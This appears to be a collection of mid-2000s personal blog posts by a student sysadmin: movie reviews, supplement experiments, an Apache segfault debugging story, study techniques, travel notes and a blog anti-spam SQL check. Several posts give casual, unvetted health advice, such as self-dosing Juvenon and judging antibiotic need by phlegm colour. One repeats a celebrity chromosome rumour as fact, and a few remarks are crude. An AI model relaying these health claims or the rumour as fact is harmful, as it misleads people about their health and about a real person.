Cronenberg's movies are about the dark side of human nature, the animalistic, raw, uninhibited. He interwines such polar ideas like violence and love, sex and anger, and does it in such a way that you begin to question what it means to be human. You start wondering whether you are anything more than an animal. Ebert said this movie is about the survival of the fittest, and I have to agree with that.

I really thought the movie was amazing. It plays like a chess game, each move coming closer and closer to a catharsis. It's as intelligent as A Clockwork Orange, and I highly recommend it for anyone that wants to come out the theatre with more questions than answers.

The trailer for this movie plays down the violence in the film. There are some quite graphic scenes and I wouldn't recommend any children seeing it.

The above picture is from a BBC show about violent behavior in humans. I found it hilarious. Scientists did a study and found that murderers had lower brain activity (glucose metabolism) in the prefrontal cortex. They say this correlates physical differences in brain structure to different types of behavior, notably violence. I can see it now, brain scanners at airport security checks. A flashing red evil light would blink whenever such a person came through. Then they could be re-routed to the psychotic plane, or short-plane, like the short-schoolbus for mentally challenged kids. Can we really dilineate a murderer from a normal person with such scans? It seems rather simplistic to me.

There are all sorts of experiments on violent behavior. The show claimed that low serotonin levels and high dopamine levels in the brain directly contribute to violence. Serotonin acts as an inhibitor, to stop feelings and thoughts from getting out of control. Dopamine is just the opposite. So scientists are searching for genes regulating those chemicals, and one such gene is the one encoding MAO-A. Studies have found that not enough MAO-A could contribute to violent behavior, because it results in lower serotonin levels. But if the MAO-A gene is expressed, there is more serotonin, and there is less tendency for violence.

So what makes the gene expressed? Nurturing. It turns out if a child is nurtured by his mother and is taught at an early age about social bonding, love, bad behavior vs good behavior, the child has a less tendency to grow up with problems. Take the same child and rear him without motherly love and he or she is more likely to turn out problematic. Is this really surprising? No, but to me the environmental influence on genetics is. There is a chemical basis to the behavior. Someone predisposed genetically to a certain behavior, or even disease, can in effect cancel out, or amplify, a gene based on their experience.

This is one of the many examples where genetics by itself cannot determine anything without also considering the experiences of the person. The person's experience itself determines whether the gene is expressed or not, and it ultimately shows that the brain can control gene expression. I find that rather amazing, and it shows the true power of the brain. It's not too hard to fathom the brain having control of other disease-related genes. Let's say you have a gene that predisposes you to cancer. Is there a possibility the brain can control whether that gene is expressed or not? I don't know, but it's interesting to think about.

No I'm not talking about the $3 per gallon kind. I'm referring to flatulence, or farting.

I was reading my Chemistry book and it mentioned a product called Beano, which is an over-the-counter supplement to prevent gas when eating certain foods. Why in the world my college Chemistry book would be advertising fart-reducing pills is beyond me, but it did get me interested.

Now I'm not saying I have a flatulence problem, but there are some foods that I eat and well, umm, let's just say I don't smell like Gucci afterwards. It's actually strange, because its the healthy foods that give me gas. Things like lettuce, broccoli, other green things, sweet potatoes, certain breads, etc. So I pretty much hate eating such foods. I know they are good for me, but they always give me stomach problems. I can't stop eating such things because I'd like to have a healthy diet once in awhile. It sucks because I can't even eat a salad without getting some problems.

They have a pretty good explanation of what gas is on Beano's website:

What causes gas?

The body does not digest and absorb some carbohydrates in the small intestine because of a shortage or absence of certain enzymes. This undigested food then passes from the small intestine to the large intestine where bacteria break down the food, producing gas. The most common symptoms of gas are flatulence, abdominal bloating and abdominal pain. In essence, the body lacks the enzymes needed to breakdown the carbohydrates found in some gassy foods like vegetables, legumes, grains, cereals, nuts, seeds and whole-grain breads. This is where Beano® steps in. Beano® contains a food enzyme from a natural source that works with your body’s digestion to breakdown the complex sugars in gassy foods making them more digestible, thereby preventing gas before it even starts.

My Biology teacher described this symbiotic bacterial environment in class. Basically, when you are born you don't really have much bacteria in your intestine. It takes some time to build up that "flora," as my professor put it. I don't know about you, but "flora" gives me the impression of a garden growing in my colon, and that's not very cool to say the least. I wonder if this bacteria can ever get out of control. Well if you know someone that farts alot, then I think the bacteria have the upper hand in that person.

Wikipedia also has some more delightful information on gas. I especially like this bit:

If sitting on a cushioned surface, the gases can be directed into the open-cell polyurethane foam and somewhat quarantined. Following the fart, standing will not release the odor, in fact, the gases will be further pushed to the center of the cushion. The gases will not leak out and be detectable, unless the cushion is compressed again under the weight of another person. The use of this phenomenon as a practical joke is obvious.

Wikipedia always has funny wording, which changes alot of course. Like on this page about sleep, the caption for the picture is "A human female sleeping." They've since changed that.

Anyway, Beano seemed like something worth trying, so I bought some at the local CVS. You are supposed to take it with your first bite when eating certain foods. All I can say is wow, it really works. I ate something that I knew for sure causes problems for me, and when I took Beano with it, there were no problems at all.

So buy yourself some if you have gas problems. Hm, I'm probably going to regret ever writing this.

I was reading a brochure from the Juvenon guys about aging experiments. They describe an experiment where scientists took away an enzyme that checks for mitochondrial DNA errors in mice, sort of like an error-checking enzyme. Not surprisingly, more and more cells in those mice started getting mutations in that DNA. What they observed however was that the mice appeared to have accelerated aging.

So they are claiming that mutations in mitochondrial DNA correlates to aging, and it would make sense to say that if you can limit those mutations, the cells might live longer. That's the selling point of Juvenon.

Disregarding whether the drug actually works, what I find interesting is this ability to accelerate aging in an animal by isolation of this enzyme. Cloning studies could benefit from this. When animals are cloned, the scientists do not really know whether it is truly healthy or not. Many problems arise later in the animal's life, so they have to watch it for a long time. It's very difficult to 'prove' that the cloning resulted in a successful organism. That's why we don't see such quick advances in cloning, it requires time for analysis of the organism. But what if we could accelerate the aging of the animal in this process? Basically doing a fast-forward through the animal's life in order to analyze it's health without actually waiting and observing the normal lifespan. Then by doing many studies like this, we could find out the problems in the cloning techniques quicker and try new ones.

As far as Juvenon goes, I've tried taking it on an off. In some instances it made me a bit jumpy, like sort of 'wired.' I seemed more energetic and could think a bit faster, however it was difficult to relax. I had trouble sleeping when I took it before bed, so I won't do that again. I have a pretty messed up mind as it is, so this may be less than beneficial in my case. I can see how it would help older people though. I may continue taking in lower than the recommended dosage. They suggest 2 tablets daily, but I might take 2 every 3 days or something like that. It's all about dosage and how your body responds to it.

I have also been taking fish oil supplements, which I feel is good idea. I don't eat any fish at all, and there are many studies showing that such nutrients are beneficial. Honestly the best regimen for me involves napping during the day. I can think alot sharper and feel alot better. Polyphasia should not be slept on .

A pretty funny ad on 'examining' yourself.

Here is your typical sysadmin day.

Update: There is a song as well.

This week I've been doing some consulting. A heavily loaded website (about 300 req/second) was having some issues such as Apache processes going haywire and eating up all CPU, and Apache processes segfaulting continously. However, the site was functioning, and only when there were alot of apaches eating up CPU did the system go to a crawl. The segfaults were of the apache child processes, not the main one.

The systems (load balanced) were hosted at Rackspace, and they pretty much set everything up for the customer, with things such as PHP, Apache, MySQL, etc. So the first thing I looked at are the haywire httpd processing eating up CPU. What could I do? Well an strace on it to start:

strace -p PID

But it didn't show anything, so it's hung somewhere before any other system call is made. Next thing, attach a gdb to that bitch:

gdb /usr/sbin/httpd PID

Then I did a 'bt' to show a backtrace of function calls and end up with:

0x00265383 in malloc_consolidate () from /lib/tls/libc.so.6
(gdb) bt
#0 0x00265383 in malloc_consolidate () from /lib/tls/libc.so.6
#1 0x00264b29 in _int_malloc () from /lib/tls/libc.so.6
#2 0x00263ecd in malloc () from /lib/tls/libc.so.6
#3 0x0040f500 in OpenSSLDie () from /lib/libcrypto.so.4
#4 0x0040fb5c in CRYPTO_malloc () from /lib/libcrypto.so.4
#5 0x006bd86b in ssl3_new () from /lib/libssl.so.4
#6 0x006c41e2 in tls1_new () from /lib/libssl.so.4
#7 0x006c5c66 in SSL_new () from /lib/libssl.so.4
#8 0x00639545 in ssl_engine_disable () from /etc/httpd/modules/mod_ssl.so
#9 0x080722bc in ap_run_pre_connection ()
#10 0x08072476 in ap_process_connection ()
#11 0x08066ac1 in ap_graceful_stop_signalled ()
#12 0x08066c14 in ap_graceful_stop_signalled ()
#13 0x08066eb9 in ap_graceful_stop_signalled ()
#14 0x08067550 in ap_mpm_run ()
#15 0x0806da2f in main ()

Hmm, ok so it's in some malloc call having to do with SSL. Well this site is not even using SSL, so the next thing I did was disable SSL. Not surprisingly, this reduced the frequency of the process going haywire, but did not rid of them entirely. Something else is going on. From the malloc calls, it appears having to do with maybe a memory leak or double-free happening somewhere. The next time it happened, it was hung in some pthread call, but not really related to any apache module. The problem is somewhat similar to this bug.

At this point I really had nowhere to go on this CPU issue. Apache was also segfaulting, and I guessed that the segfault problem is related to the CPU problem, so I decided to look into that. Now it gets really interesting. Trying to debug an Apache server getting 200-300 req/sec is not very fun. First of all you can have virtually no downtime before everyone starts realizing it, so whatever I needed to do, I had to do it with the least impact.

Apache reported to the logfiles something like:

[Thu Sep 15 04:14:26 2005] [notice] child pid 24195 exit signal Segmentation fault (11)

I also saw lines such as:

Allowed memory size of 16777216 bytes exhausted (tried to allocate 10 bytes)
free(): invalid pointer 0x9910020!

But this is not very helpful to me. What was PID 24195 doing? Which file was it serving? I first added PID logging to the logfiles with the '%P' custom log statement, similar to:

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" PID: %P" debuglog

Now I could correlate the segfaulted PIDs with the requests. But get this, it told me nothing! All of the crashes seemed to be random, some on .php files, some on even .jpg files! WTF? This told me more and more there is a memory leak somewhere, and the symptom is not showing up until much later. Next step, I want Apache to dump cores. This was done by adding a:

CoreDumpDirectory /tmp/cores

Great, now I have all these core files. I look at a backtrace:

gdb /usr/sbin/httpd core.12345
bt
#0 0x06ca51b0 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:395
395 zv->refcount--;
(gdb) bt
#0 0x06ca51b0 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:395
#1 0x06cb71f8 in zend_hash_destroy (ht=0x8821c3c)
at /usr/src/debug/php-5.0.5/Zend/zend_hash.c:519
#2 0x06cae8de in _zval_dtor (zvalue=0x881f47c)
at /usr/src/debug/php-5.0.5/Zend/zend_variables.c:52
#3 0x06ca51d8 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:397
...

I see pretty much random location crashes, but they are all within PHP shutdown sequences. This is still not telling me much. The next thing I wanted to do was an strace on a working apache process and wait for it to crash. Luckily, the crashes were so frequent, I could strace on literally any apache PID and after a few minutes would be guaranteed a segfault.

Now what I saw was interesting. Almost always before a segfault, I would see some Mysql traffic that involved trying to access a nonexistent table. It turns out some the website's PHP code had some legacy stuff doing this. So I thought, ok a missing table is not supposed to segfault apache, but lets get this code fixed either way. After a note to the developers, it was fixed. And guess what? There was a significant decrease in the number of segfaults per minute. Before it was about 1 every second, now it was 1 every minute. Clearly something was related to mysql, but at this point in my debugging process I just did not realize it.

All of this has been compiled and setup by Rackspace. During all of this, I'm opening tickets on their system and having them look into the problem. They are doing their own debugging, and even late one evening ran apache within a gdb and watched it. They pretty much thought it was bug in PHP, and asked us to report it to the PHP developers. Rackspace did do alot of debugging and I was impressed with their work, but I felt this was just going in the wrong direction. We spent many days trying different debugging techniques, PHP versions, and what not. But still no luck. At one point we found one .php script that ALWAYS segfaulted, and it had to do with XML stuff. We installed stable XML/XSLT libraries and it went away for that script, but still segfaulted elsewhere .

Rackspace showed me some straces of their crashes. They were all meaningless except for one thing, I noticed that shortly before each crash, there was a mysql insert statement executed. The fact that a mysql 'table not found' had increased the segfaults got me thinking, could this be something related to mysql or libraries?

I did some searching and came across this bug, which explained that PHP might crash if it was compiled with one mysql library API version, but there is a different version on the server. The next thing I look at is phpinfo(). I see it was compiled with mysql librares 3.23.58, however the mysqld running on the system was 4.1.11. I had a eureka moment. Could a change in data structures between the versions in the API cause some issues? I thought that could likely be the case.

It just so turns out, that when Rackspace compiled PHP, they did so on a 'build host', which had mysql 3.23.58. Then they took this PHP and installed it on our server. I asked them to recompile it with the same mysql version that we have. Well they did so, and it has been about 5 hours and not one segfault. I think we got it. I'll have to watch it longer, but sometimes you just get a feeling that you just know you figured it out.

This all took place over a week. When I should've been studying, instead I was in the FAU library debugging apache crashes . It's all good though, because I am still learning something in the process. It is fun to do these kinds of things. Now I just need to make my invoice .

Lesson learned? Build systems are not very good if they differ from the target system.

Update: This did in fact fix the problem.

2 days ago I got in a little accident on I95. It was luckily very minor. It was around Gateway Blvd. northbound, and that place is always jammed around 6-7pm as many lanes merge into two. Anyway, first the guy in front of me slams on his brakes. Then I do and successfully stop before hitting him. Then I watch in my rear-view and see the guy behind me successfully stop ok.

At that point I'm like 'whew' and go on listening to my music. Then BAM, the guy behind me runs into me. It turns out a lady behind him hit his car which pushed it into mine. We all 3 pulled over and I didn't get any damage to my rear bumper. Neither did the guy behind me to his front bumper. We decided it was not enough to report it. I'm not sure what happened to his rear bumper, but the lady was apologizing profusely saying she had a baby in her car distracting her, etc. I said "is everyone ok?" and then took off. No point in increasing my insurance over this if everyone agrees to let it slide.

Anyhow, I95 sucks.

Here is a very heartwarming story about someone dedicating his life to help kids in Haiti.

I read this in The Homeless Voice, which is a great newspaper sold to support the homeless. The articles are all very inspiring and touching. It makes you realize how important someone, even a homeless person, can be. So it really saddens me to see on the website a story about teenagers beating a homeless man to death "for fun."

There is also a great little 'advertisement' in the newspaper. It shows a picture of someone resembling Jesus and holding a 'Will work for loaves and fishes' cardboard sign. On the top it reads:

How can you worship a homeless man on Sunday, and ignore one on Monday?

Indeed.

It was just pointed out to me that OS X is case insensitive:

Viraj-Alankars-Computer:~/a virajalankar$ ls -l
total 0
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 a.txt
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 b.txt
Viraj-Alankars-Computer:~/a virajalankar$ mv b.txt A.txt
Viraj-Alankars-Computer:~/a virajalankar$ ls -l
total 0
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 A.txt

Hmm, that seems kinda dangerous doesn't it?

I saw a BBC documentary about the brain and they were talking with one person who had incredible memory skills. They would shuffle 20 decks of cards, have him look through the decks, and then ask him to recite every card in each deck in order. Of course he was able to do it, but how?

It turns out his method involved first some preparation. He took a walking trip around the city and got into his mind certain locations and monuments. Then he associated each card with some object, say a queen of spades being a dog. He then created a story that described him walking around the city and seeing strange happenings with his cast of characters. The wierder the scenario is, the easier it is to remember. The location aspect makes a big difference, because his storyline proceeds as he walks through the city.

Another person had to memorize a list of unrelated words, and imagined themselves walking through their house seeing all of these strange object that were or were related to the words he needed to remember.

There are all sorts of memorizing tricks, but the storyline and location method was new to me. I decided to try it for my first Biodiversity exam. It works, and I'm pretty sure I got a 100% on the exam. This class is pretty much rote memorization of phylums, species, and what not. For some of the sections I just created a very wierd scene in my head. Others I created a ridiculous story. Either method would have images that would 'hint' at what needs to be remembered. Let's go through an example.

First here is a small section of notes that I needed to remember:

Phylum Pyrrophyta - Also called dinoflagellates

- Chlorophyll A+C
- 2 flagella
- cellulose cell wall
- Pfiesteria is an example genus
- These organisms cause red tides
- zooxanthellae are the organisms in corals
- some exhibit bioluminescence

Here is the 'story' that I used to remember this:

A pyromaniac with 2 whips was very fiesty and was walled up in a zoo. He drew blood from zoo animals to supply energy to his glowing coral necklace. He was cadaverized by a dinosaur.

This is absolute rubbish. The main point is to not so much memorizing the wording, but the imagery. Once you get the crazy images in your head, the words will come. Then these words are hints towards what is really needed to be remembered. The word pyromaniac is linked to pyrrophyta. The fact that he was killed by a dinosaur gives rise to 'dinoflagellates.' His 2 whips mean 2 flagella. The term 'cadaverized' is used to remember chlorophyll C (A is common to all of the plant-like phylums on this test, so there was no need to incorporate this extra info in the story). The mention of 'zoo' relates to zooxanthellae, and the 'glowing' to bioluminescence. 'Blood' refers to red tides. 'Fiesty' to pfiesteria, and so on.

Obviously there is a language that needs to be applied here, and it is nonsensical. The crazier it is, the easier it is to remember. I of course need to know something about the topic, and be able to induce 'zooxanthellae' from 'zoo', but that's just vocabulary you will already have from reading. There is no silver bullet to memorizing, but different techniques can be applied at different places, depending on what makes sense (or nonsense) to you.

This is just one example, I also used much more complicated storylines that incorporated many pages of notes to remember. In the end the stories were much shorter than my actual notes, so there is a condensing effect. The stories were so wild and were easy to remember the imagery. Things like Smurfette from The Smurfs swimming in slime (representing a fungus-like slime mold organism). On the test, when I saw keywords in the question, they reminded me of the different parts in my story, and from there I was able to get the answer. It takes alot of work though, but I find coming up with the wierd stories kinda fun. I will need to work at it more to sharpen my storymaking skills.

So I'm browsing through Discover magazine and notice an advertisement for Juvenon, supposedly an anti-aging drug. I decided to do some more reading into it. I've been reading alot about cognitive enhancement drugs, and also trying some, and a common theme about these drugs is they offer some sort of anti-aging, anti-cancer, anti-epileptic, or anti-Alzheimer's disease effects. I would not be surprised if anti-aging drugs are actually cognitive enhancers as well. They are ultimately affecting cells, including neurons.

Juvenon was developed by a biochemist named Bruce Ames. Here is a highly respected person, who also created a widely used test to identify cancer-causing substances, now developing an anti-aging drug. After doing some more reading, this does not look like quack technology, and is based on sound studies. Here is an interesting quote from one of the articles linked above:

In his lab, he and his colleagues have been systematically depriving human cells of one essential nutrient after another and then looking to see what happens. What they've observed isn't pretty. When cells fall short on any one of a handful of nutrients that have been tested so far, Ames has discovered symptoms of severe genetic damage - the kinds of mutations in DNA that are believed to lead to cancer. Nutrient deficiencies also appear to disrupt the function of mitochondria - the tiny organs that provide cells with fuel. The result: premature aging of cells.

What they are essentially saying is a lack of nutrients can result in cancer. Ames attacks current diets of most Americans, stating that we do not get the proper nutrients. You are doing yourself a disservice if you do not take a multivitamin daily. I agree with that completely. You are literally what you eat. If you are not taking vitamins, go buy some. Most are water-soluble, so any 'extra' nutrients would be removed by the kidneys. It's insurance for your body.

I'm fascinated with mitochondria. These are small organelles within each cell that have an evolutionary origin of bacterial cells. It is supposed that at some point, these mitochondrial bacteria came into the animal cells and an endosymbiosis took place. They even have their own DNA and replicate on their own. These machinery supply 98% of the energy for our cells. So the familiar ancestral evolutionary tree sort of breaks down, and rather you have separate organisms fusing into one. I find that pretty amazing.

So what is this Juvenon? First of all the proceeds for selling the drug claim to support research on the drug, and there is no profit for Ames in this. That is the claim anyhow. Juvenon is a combination of Acetyl-L-Carnitine and Alpha Lipoic Acid. There has been alot of research on both of these, and there are positive effects. Essentially, carnitine is required for mitochondria function, and ALA is like a catalytic converter. Mitochondria release free radicals when functioning properly, and even more so when given carnitine. ALA acts to remove those. The goal of Juvenon is to keep these mitochondria in top condition, avoiding deterioration.

My opinion? It can't hurt to try. The fact that this was created by a well-respected biochemist gives it some credibility. There are some good interviews with Ames and he gives very good advice. I've ordered a bottle of this and will see if I notice any effects.

For a funny anti-Juvenon critique, check here.

Here's an interesting critique on how New Orleans is being handled. Warning, article tilts a bit towards the left .

If there was ever a director that made me feel like I was at the location where the film took place, it is Fernando Meirelles. I was blown away by City of God, and when I saw the previews for The Constant Gardener mentioning it was directed by the same person, I had to see it as soon as it came out.

Well I saw it tonight and am amazed. The amount of energy the film conveys is just mesmerizing. You feel like you are in the heart of Africa. This director makes alot of use of contrast, and there are some great scenes of beautiful dinner parties or golf resorts, and then the slum and chaos just a few inches away. The use of color in this film is really well done and enforces this contrast.

It's a very dark, romantic, and suspenseful film about a not-so-nice pharmaceutical industry. It's rare a film could make me cry, but this one definitely gave me some tears. It was just beautifully done and is everything a movie should be. The story is not difficult to believe, and makes you really wonder. Go see it!

One thing that you invariably see in university life is the latest fashions. It's sort of an experimental petrie dish for the wierdest and sometimes sexiest stuff. As far as the girls, I don't think I've seen one girl without a tatoo on the small of her back, and bare midriffs are the norm. Also t-shirts with quotes such as "All guys want a blonde" written on them in big letters seems to be 'in'. I must say I am having trouble keeping my concentration.

I remember seeing one guy in the library wearing about 10 watches on his arm and some wierd red and black clothing with Slipknot written all over. I thought it would be kinda funny to ask him for the time, but held back. Anyway I wondered what this band Slipknot was about. Then I heard Duality on the radio, and man this group kicks ass. How can I not love a song with a chorus of "All I've got...all I've got is insane..."?. I had to buy some tunes on Itunes. It's very hard metal, and listening to that song in the morning at 6:30am is like a shot of adrenaline for me. I blast it in my car and most people are like WTF is that noise.

I have pretty strange tastes in music. I go from really lame teenage love songs to hiphop to mind numbing metal depending on my mood. Actually, it's usually the music that determines my mood so I have to be careful what I listen to!

Well I've been sick for the past few days. I think it's just a bad cold I got while travelling with little sleep. All of this medical technology and still no cure for the common cold.

Some phlegm advice:

Always check the phlegm color. If it's clear, white, or pale, the infection may still be viral, and antibiotics may not be necessary. If it's yellow, green, brown, or bloody, or if you are having fevers, chills, chest pains, or have other health problems, you might need antibiotics. Contact your health care delivery person.

Only Wes Craven could make a movie with a villain that wears a scarf and is still scary. This is just a fun movie, that's not afraid to make fun of itself. It keeps you on the edge of your seat, and seemed to me like a fast-paced Alfred Hitchcock flick.

The bad guy is the same dude who played the villain in Batman Begins. I thought he acted well in that movie as well as this one. I think he will be playing alot of psychopaths in the future. Wes Craven seems to like humiliating the villain when it's their turn to pay, almost to the point of absurdity. This gets the audience quite worked up, and cheering at the end.

A big difference from Nightmare on Elm Street et al, the woman hero in this really kicks some ass. It's interesting how women's roles have changed in horror and action movies.

Recently saw a Flintstones vitamins commercial that mentioned their product now contains choline. This is an interesting drug that is mentioned in the Smart Drugs book. I find it interesting that this had been added to childrens' vitamins. It is found naturally in various foods.

Choline has alot of good properties to it, but one side effect is taking it as a supplement can cause a fishy odor. So if your child starts smelling like tuna and he/she is taking Flintstones or something else with choline, might wanna reconsider. Granted you need a large dose, but children probably will need a smaller dose. What's strange is I don't even see the amount of choline ingredient on their web site.

Very interesting article on health insurance.

So I'm hearing on the news about yet another court case where the defendant claims he killed because of too many hours playing Grand Theft Auto. Now there is some new game called Bully coming out (by Rockstar of course) that is reminiscent of Columbine.

How come no one claims in court that "Fox News made me do it" or "CNN made me do it"? I wonder if the news stations would even report such things. Honestly I'm finding network news more and more despicable. It's filled with bad actors, unbelievably happy about stupid news, and overly serious about bad news. It is just so stupid and fake how news anchors try to convey their emotions in a patronizing way. Everyone seems like lapdogs trying to gather attention from viewers, and it is just sickening to my stomach everytime I turn on the television. I'd like to see their IQ numbers scrolling across the bottom of the screen.

I know these anchors just want their paycheck and to go home. Whatever happened to real journalism? I'm wondering who are the Dan Rather's of today. Who is worthy of a day long remembrance by all news stations when he/she dies? Would you honestly give a shit if any of these CNN or other station's news achors died?

I have a very cool Anatomy & Physiology professor named Dr. Curless. He's an old burly guy with a good sense of humor. Here is a cool extra credit option on his syllabus:

If you complete a martial arts course this semester on or off campus and provide documented evidence, signed by the instructor that you did so, 10 points will be added to your overall sum of points before semester average is calculated.

If you complete a rigorous physical fitness course this semester, on or off campus, and provide documented evidence of such, 5 points will be added to our sum of points before the semester average is calculated

Basically he wants students to be in shape and be able to defend themselves. He gave an example of going to elementary school and seeing most kids looking like the Michelin man.

It's true, kids these days are out of shape, and eating crap. In fact one of his points on the syllabus on how to do good in the class: Eat well. He also said that you will do bad unless you form study groups. The reasoning is that there are alot of notes, and students will not be able to take all of them and their mind will wander occasionally. The purpose of study groups is to fill those holes in your notes. This is all very good advice. You get to meet cool people, and for me at least, the best way to learn something is to teach it.

As a computer science student, I did everything mostly on my own. I was a loner and got A's. The nature of computer studies is that you do most of the work alone. That's kinda sad in my opinion, and colleges should encourage more group work. When you get an IT job, it's rare you are working alone, so why not teach the courses that way?

A student pointed me to this useful site that provides ratings by students of professors for many major colleges.

Arrived back from CA Monday morning on the red eye flight. Had planned to go directly to school from there as it was the first day of the semester, but was too tired and missed 2 classes. Oh well, first day, can't be much going on.

Here are the courses I'm taking, as well as grades of my last semester. I did pretty good, but this semester will be alot tougher with more credits. FAU is extremely crowded, with alot of freshman (and freshwoman .

They opened up a Starbucks on campus and man are they going to make alot of money. I even succumbed and bought a frappuccino.

CA was great, the weather is cool (60-65 F). Build a city on a mountain and that's pretty much what San Fran looks like. I can't believe how steep the roads are. I remember walking outside in the morning and not noticing anyone jogging or anything which seemed wierd to me. But then after a few minutes of walking uphill, I realized why. That is extremely tiring.

Some roads are so steep, that buses aren't supposed to go on them or else they'll get stuck when the road becomes level again. Guess what, I saw a bus get stuck, and it was pretty hilarious. There is huge Chinatown and I didn't realize there were so many orientals in San Fran. Columbus and Broadway is the scene for night life and it was definitely cool to hang out there. There is always something to do and people to meet in the city. The lifestyle is so different from FL. People are so isolated here, but in big cities there is alot more social interaction and mostly friendly people which is very cool.

I met up with Prashant and a buddy of his, as well as hung out with some others attending the wedding. We had a great time going around the city. The wedding was also fun. It's the first Jewish wedding I've been to, and was definitely an interesting experience. We did alot of dancing.

I have a short vacation this weekend and am now sitting in the Fort Lauderdale airport waiting for a plane to San Francisco, CA. I'm going to attend a friend's wedding. Should be fun, and I heard the weather there is 65-70 F. This summer in FL is extremely hot, sometimes in the 100s! These summers are getting hotter and hotter. Maybe we need some more pollution to cool things down. Anyhow, I got so caught up in it I was originally packing shorts and t-shirts for CA. Luckily I checked the weather and then packed some warmer clothes.

I'll most likely catch up with Prashant there and will see what he is up to. I come back on Monday, and have to go straight from the airport to school. That's gonna be a loooong day . I'm bringing some Melatonin pills to hopefully help adjust to the time shift.

... they pull me back in. That's a line from Godfather 3, which sucked. It's only line I like in the movie.

For the past few days I did a consulting gig. The task was to move a very busy site from one server to a load balancing setup with 2 servers. When I say busy, I mean about 280 requests per second... per SECOND! I am constantly amazed at what Linux and Apache can handle.

The site was generating about 2gigs of logfiles per day. Part of the task was to combine web statistics from both of the servers into one report. awstats was being used for log analysis, and it was taking on the order of 4-5 hours to process a day's log. Plus the database it creates itself was very big (about 200megs), and whenever someone would access the awstats CGI, it would take about a minute to load, killing the CPU in the process.

I setup the load balancer (hosted by rackspace), configured the web servers to mirror each other, and wrote a script to combine logs together for awstats with the logresolvemerge.pl tool. It seems to work pretty well, and analyzing 2 separate smaller logfiles is actually quite faster (1-2 hours). I also made awstats generate static pages instead of running as a CGI, which reduced load quite a bit. Apache has a pretty cool server status module (especially with the ExtendedStatus option), which shows in realtime how the server is doing, requests per second, etc.

How did we go from '' to this:

I had no idea the Beatles made such a violent song. This is hilarious.

I found this really fascinating. It's a hair cell taken from a human ear, and it dances to music. Many of them put together is how we hear.

Humans are diploid, meaning that we have 2 sets of chromosomes, one from each parent. We also have haploid cells, such as sperm and ovum, which have only 1 set. The fusion is what creates a person.

In Biology class we learned about parthenogenesis, which is essentially self-fertilization in the female without requirement of a male. In fact the Greek roots of the word mean "virgin birth." When the teacher later asked what was parthenogenesis in a review, a student jokingly answered "immaculate conception."

Could Jesus have been born in such a way? Well for a child to be male, the Y chromosome must come from a male. If Mary was XX like most females, that wouldn't work. However, there is another scenario. There is the case of women like Jamie Lee Curtis, who are actually XY. That's normally reserved for males, but our teacher explained it as the Y chromosome pretty much being ignored by Jamie. But could there be self-fertilization in such a person?

Supposedly the answer is no. But maybe one day such a human will arise. It's not that far fetched, evolution can be surprising. Also, there are rumors that the Y chromosome, and men, are on their way out. Maybe we will become useless one day .

Update: I had originally said XXY was Turner syndrome in a female, but that's incorrect. XXY is Klinefelter syndrome in a male. X (just one) is Turner syndrome in a female.

My dad was telling me about people actually undergoing a tapeworm diet. Basically the idea is to ingest a tapeworm, and it will eat alot of the food you do, thereby letting you eat without gaining much weight. Of course the worm could take away nutrients that you really need. When the patient wants to get off the diet, he/she ingests a pill that kills the tapeworm.

If you want to see some horrible worm infections in humans, follow this link. Warning, I suggest you not click on that if you are squeamish.

So I have all these AVI files of cool educational TV shows, and yesterday I wanted to be able to watch them on my plasma TV instead of my laptop. I used to be a big audiophile so I'm quite familiar with AV connections.

I have a Panasonic plasma that has a VGA input. I strolled to CompUSA and bought some connectors, and after some fiddling, am able to now watch movies played on my laptop on my TV. I'm very surprised at how clear it looks, and at 1024x768 the desktop is even usable. I now have a audio and VGA cable coming out of my TV system so either I or my brother can hookup our laptops. There is still alot of remote control fiddling to get the right input settings, but no matter how much technology there is, you will still have 3 remote controls.

Then I thought, ok this is cool. But what I'd also like to do is make DVDs out of these AVIs in order to play them on a regular DVD player. One example is the show Anatomy for Beginners. I really want people to see this, and even wanted to give it to my biology professor to show to students. It's a good preparation to make sure students really want to get into medicine .

So began my foray into DVD burning on OS X. I thought it would be as simple as starting up this iDVD program on my dock that I've never started before. But of course it is never that easy. That program only lets you use Quicktime movies, I think. It didn't like my DivX AVIs that's for sure. I started searching around for free tools but the results I got were sort of like searching for Viagra: I got a shitload of useless results. Then I thought, maybe it'd be easier to do this on my Linux box. I searched the APT repositories for DVD creating tools but ended up needing countless dependencies for command line tools that would take me ages to learn.

Back to searching for OS X tools, and I came across ffmpegX, which claims to be a universal converter. After alot of fiddling, I was able to make DVD .VOB files, which were then converted to a .DMG file, and then burned with OS X's Disk Utility app. That process took about 3 hours for a 50minute show. When I went to play the DVD, the aspect ratio was changed from 16:9 to 4:3 for some reason. I'm sure that can be fixed, but shit, 3 hours for this process? Plus the app is all GUI, so it is not easy to script. Well I guess I could use Applescript.

Anyhow, it was an interesting experience, much more involved than I orginally expected. I don't think I will be making alot of DVDs .

Just a few hours after my post about my blog spam, I received what was pretty much an attack of 200 or so spam comments about online gambling. All of them were from different IPs, many cable modem IPs, so this tells me they are using bots of hijacked systems. All this for blog spam? And why do this on my blog? It's not like I get alot of hits. I'm flattered guys .

So it was back to the drawing board. I'll describe my defenses because I'm more interested in being secure than obscure.

Since all the spam was from different IPs, I can't rely on that to identify the spammer. But I still liked my idea of using soundex functions to determine 'similar' spam. Now what I do is first compare the new comment coming in to all comments already in the database with a soundex match. If there is any comment that is similar already in the system, the new entry is rejected. This means that comments need to be essentially unique. Here is how to get a list of past comments and their number based on phonetic comparison if there are 5 or more matches:

SELECT soundex(comment_content) as a, count(*) as b
FROM $tablecomments WHERE soundex(comment_content) =
soundex('".$DB->escape($comment)."') GROUP BY a
HAVING b >= 5
ORDER BY b DESC

Actually my HAVING clause is currently using 1, which is essentially returning results for any non-unique entries, but I can increase that number later if needed. HAVING and WHERE are different functions. HAVING can apply to aliases, and after the GROUP BY is already done.

b2evolution allows for a URL field for comments. This is being utilized by spammers as well as the comment data field. So I've added another defense. If a URL is posted more than 5 times in the last 24 hours, I reject. That might restrict people from posting more than 5 comments a day, but I don't expect that much anyway.

